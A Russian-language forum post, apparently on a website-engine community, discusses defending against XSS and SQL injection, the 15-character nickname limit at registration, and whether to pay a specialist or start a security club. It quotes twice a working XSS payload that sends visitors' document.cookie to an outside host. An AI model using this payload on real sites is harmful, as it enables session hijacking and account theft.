<script>img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;</script>
При регистрации:
Максимальная длина = 15
Думаю нет смысла считать символы в первой строке и так на лицо переделка. Теперь гепатетически все же найдется 20-100 человек скинутся на спеца, где гарантия что один из заказчиков не захочет переделать под себя и тем самым не откроет брешь в защите.
Плюс, Лезгинка не обижайся, но все эти проделки школоты уже описаны в интернете и думаю кто то из спецов в каталоге может сделать зашиту от sql xss атак.
Группе, к которой вы принадлежите, запрещено просматривать этот скрытый текст
ИМХО трата на спеца, сперва нужно сформулировать чего хочешь, а что сказать ну вот шОб було уСё, так спецы народ конкретный, усё значит усе, тобишь переходи на двиг за 999 баксов, вот тогда мол дадим гарантии и то 90%
А вот насчет коллективного блога по защите согласен, а лучше клуб закрытый.
А вот что при вставке никнейма
img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;
тобишь обрезка джаваскрипта и ссылка не активна.